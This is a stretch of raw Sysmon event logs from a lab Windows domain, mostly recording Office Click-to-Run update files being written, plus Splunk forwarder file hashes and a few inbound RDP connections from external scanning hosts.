Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Shims.dll2021-04-20 14:54:11.096 11241100x800000000000000064322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.096{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.OleDbProvider.dll2021-04-20 14:54:11.096 11241100x800000000000000064321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.096{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.OleDbInterop.dll2021-04-20 14:54:11.096 11241100x800000000000000064320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.096{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.OAuth.dll2021-04-20 14:54:11.096 11241100x800000000000000064319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.096{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.EventSource.dll2021-04-20 14:54:11.096 11241100x800000000000000064318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.096{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Excel.dll2021-04-20 14:54:11.096 11241100x800000000000000064317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.096{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Excel.Extensions.dll2021-04-20 14:54:11.096 11241100x800000000000000064316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.096{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Excel.EditorRibbon.dll2021-04-20 14:54:11.096 11241100x800000000000000064315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.096{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.AddinTelemetry.dll2021-04-20 14:54:11.096 11241100x800000000000000064314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.096{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.HostIntegration.Connectors.dll2021-04-20 14:54:11.096 11241100x800000000000000064313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.096{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Exchange.WebServices.dll2021-04-20 14:54:11.096 11241100x800000000000000064312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.096{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.DataIntegration.TransformDataByExample.dll2021-04-20 14:54:11.096 11241100x800000000000000064311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.096{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.DataIntegration.FuzzyMatchingCommon.dll2021-04-20 14:54:11.096 11241100x800000000000000064310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:11.096{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.DataIntegration.FuzzyMatching.dll2021-04-20 14:54:10.893 354300x800000000000000064309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:09.641{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-25210-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049473Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:11.807{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E44C8623BEE3BED86E720446A91EAED0,SHA256=10DF91E5418E47FEB60F3AF833374BF089A6061A64E2DB92AE99D4E8C3D8A11E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049472Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:11.432{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97DC027654139928A1C08D4F9717A90B,SHA256=77CADFB5510DDAEA1942A6EEF10B7F39A2AAEC39B52969AE5B2B8795BA723419,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049471Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:09.242{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56106-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049470Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:08.969{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com50101-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 11241100x800000000000000064356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:12.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\wxpr.dll2021-04-20 14:54:12.971 23542300x800000000000000064355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:12.971{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D6DCDEAE49AA8F8F747DCF317A64259B,SHA256=B32A0271AC463AFE7AC94E0256E055F2093D4257AC9FAECED4E6D57AA6163AA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:12.956{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=086707BC48ACDE26A5D3C238186CB247,SHA256=2B440F6408EF3BF13F994734C94EBAC949888A6506A4BF60A05C888DCC388647,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000064353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:12.956{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=580EDB66B531139790D16A016CBEADB4,SHA256=52FFCB885E4DD225C99F8B28A293A3141C419000D1668C54F3D69D3B591D9569,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:12.956{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\WacLangPack2019Eula.txt2021-04-20 14:54:12.956 11241100x800000000000000064351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:12.956{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\UccApiRes.dll2021-04-20 14:54:12.956 11241100x800000000000000064350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:12.940{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookNaiveBayesCommandRanker.txt2021-04-20 14:54:12.940 11241100x800000000000000064349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:12.768{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookTaskNaiveBayesCommandRanker.txt2021-04-20 14:54:12.768 11241100x800000000000000064348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:12.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msvcr120.dll2021-04-20 14:54:12.581 11241100x800000000000000064347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:12.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ocimport.dll2021-04-20 14:54:12.581 11241100x800000000000000064346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:12.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Rtmpal.dll2021-04-20 14:54:12.581 11241100x800000000000000064345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:12.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Rtmmediamanager.dll2021-04-20 14:54:12.581 11241100x800000000000000064344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:12.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ocrec.dll2021-04-20 14:54:12.581 11241100x800000000000000064343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:12.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\roottools.dll2021-04-20 14:54:12.581 11241100x800000000000000064342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:12.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Psom.dll2021-04-20 14:54:12.581 11241100x800000000000000064341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:12.565{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PropertyModel.dll2021-04-20 14:54:12.565 354300x800000000000000064340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:10.186{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57483-false10.0.1.12-8000- 23542300x800000000000000049474Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:12.494{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A63613CE8FEF18087995EB3B26A5129,SHA256=BD2F40D4BC7F8AD0AEE885452C437B771F6886233118F497FAEC9027433DB040,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:13.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe2021-04-20 14:54:13.971 11241100x800000000000000064427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.971{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Microsoft.AnalysisServices.AzureClient.dll2021-04-20 14:54:13.971 11241100x800000000000000064426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\UccApi.dll2021-04-20 14:54:13.862 11241100x800000000000000064425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msvcp120.dll2021-04-20 14:54:13.862 11241100x800000000000000064424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\lyncModelProxy.dll2021-04-20 14:54:13.862 11241100x800000000000000064423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ACWIZRC.DLL2021-04-20 14:54:13.862 11241100x800000000000000064422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.862{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\AccessRuntime_eula.txt2021-04-20 14:54:13.846 11241100x800000000000000064421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.846{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\BHOINTL.DLL2021-04-20 14:54:13.846 11241100x800000000000000064420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.846{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\msmgdsrv.dll2021-04-20 14:54:13.846 11241100x800000000000000064419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.846{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientVolumeLicense_eula.txt2021-04-20 14:54:13.846 11241100x800000000000000064418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.846{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\EXPTOOWS.DLL2021-04-20 14:54:13.846 11241100x800000000000000064417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.846{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ExcelNaiveBayesCommandRanker.txt2021-04-20 14:54:13.846 11241100x800000000000000064416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:13.800{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe2021-04-20 14:54:13.800 11241100x800000000000000064415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.800{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Microsoft.AnalysisServices.AzureClient.dll2021-04-20 14:54:13.800 11241100x800000000000000064414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.800{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LyncVDI_Eula.txt2021-04-20 14:54:13.800 11241100x800000000000000064413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.800{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\LyncBasic_Eula.txt2021-04-20 14:54:13.800 11241100x800000000000000064412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.784{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\xlsrvintl.dll2021-04-20 14:54:13.737 11241100x800000000000000064411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.753{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MAPISHELLR.DLL2021-04-20 14:54:13.753 11241100x800000000000000064410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.753{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MOR6INT.DLL2021-04-20 14:54:13.753 11241100x800000000000000064409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.753{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OcHelperResource.dll2021-04-20 14:54:13.753 11241100x800000000000000064408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.753{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\PSS10R.CHM2021-04-20 14:54:13.753 11241100x800000000000000064407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.737{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\SETUP.CHM2021-04-20 14:54:13.737 11241100x800000000000000064406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:13.737{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\PSS10O.CHM2021-04-20 14:54:13.737 11241100x800000000000000064405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.737{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\PortalConnectCore.dll2021-04-20 14:54:13.737 11241100x800000000000000064404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:13.737{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 